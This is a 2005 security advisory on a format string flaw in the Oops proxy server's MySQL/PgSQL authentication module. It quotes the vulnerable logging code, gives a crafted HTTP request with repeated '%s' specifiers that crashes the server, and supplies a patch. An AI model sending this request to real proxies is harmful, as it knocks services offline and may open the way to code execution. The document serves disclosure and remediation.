Advisory Name: Oops proxy server format string vulnerability in passwd_mysql/passwd_pgsql module
 Release Date: 04/14/2005
  Application: Oops <=1.5.23
         Site: http://oops-cache.org
     Platform: Linux and unix compatible
     Severity: Attacker can crash proxy server and possibly execute commands
       Author: Edisan <edisan@ghc.ru>
	         RST/GHC
OVERVIEW:

Oops! - is a proxy server, the main aims of its development being stable operation,
service speed, main protocols support, modularity, ease at use.
The format string vulnerability found in MySQL/PgSQL authentification module.
Successful exploitation may potentially allow execution of arbitrary code.

DETAILS:

The format string vulnerability lies within the auth() function
which is declared in oops-1.5.23/src/modules/passwd_sql.c file

...
MODULE_STATIC
int auth(int so, struct group *group, struct request* rq, int *flags)
{

...

    sprintf(logbuf,"auth(): request: "
                 "ip=%d.%d.%d.%d host=%s method=%s\n",
                 (rq->client_sa.sin_addr.s_addr      ) & 0xff,
                 (rq->client_sa.sin_addr.s_addr >>  8) & 0xff,
                 (rq->client_sa.sin_addr.s_addr >> 16) & 0xff,
                 (rq->client_sa.sin_addr.s_addr >> 24) & 0xff,
                 rq->url.host,
                 rq->method
            );
573:    my_xlog(OOPS_LOG_NOTICE|OOPS_LOG_DBG|OOPS_LOG_INFORM,logbuf); // <== Vulnerabiblity
...

The function my_xlog() has located in oops-1.5.23/src/lib.c file, and used arguments as a format string specifier to vsnprintf()
my_xlog(int lvl, char *form, ...)
{
va_list         ap;
char            ctbuf[80], *c;
time_t          now;
void            *self;
char            fbuf[256], *s = fbuf, *pe;
int             l, le;
int             err = ERRNO;
ERRBUF ;

    if ( !TEST(lvl, verbosity_level) ) return;  // <= passed by default
..
..
    if ( TEST(lvl, ~ OOPS_LOG_PRINT) ) {
            char        *b1;
            int         b1len;

            b1len = strlen(ctbuf) + 20;
            b1 = malloc(b1len);
            if ( b1 ) {
                char    buf[256];

                snprintf(b1, b1len-1, "%s [%p]", ctbuf, self);
                vsnprintf(buf, sizeof(buf)-1, fbuf, ap); // <= call vsnprintf(...)
                put_str_in_filebuff(b1, &logbuff);
                put_str_in_filebuff(buf, &logbuff);
                free(b1);
            }
    }

    if ( TEST(lvl, OOPS_LOG_PRINT) )
        vprintf(fbuf, ap);   // <== call vprintf(...)
..
}

EXPLOIT:

A HTTP request of the following:

----8<--
GET http://%s%s%s%s%s%s%s%s/ HTTP/1.0
Host: ghc.ru
Proxy-Authorization: Basic Z2hjOnJzdA==

-->8----

will cause program segfault

SOLUTION:

The patch is included here:
--- passwd_sql.c        2002-03-09 20:46:02.000000000 +0300
+++ passwd_sql.c       2005-04-13 11:02:44.950595216 +0400
@@ -570,7 +570,7 @@
                 rq->url.host,
                 rq->method
            );
-    my_xlog(OOPS_LOG_NOTICE|OOPS_LOG_DBG|OOPS_LOG_INFORM,logbuf);
+    my_xlog(OOPS_LOG_NOTICE|OOPS_LOG_DBG|OOPS_LOG_INFORM, "%s", logbuf);

     if ( rq->av_pairs)
        authorization = attr_value(rq->av_pairs, "Proxy-Authorization");

CREDITS:

Discovery of this issue is credited to RST/GHC.

http://rst.void.ru
http://www.ghc.ru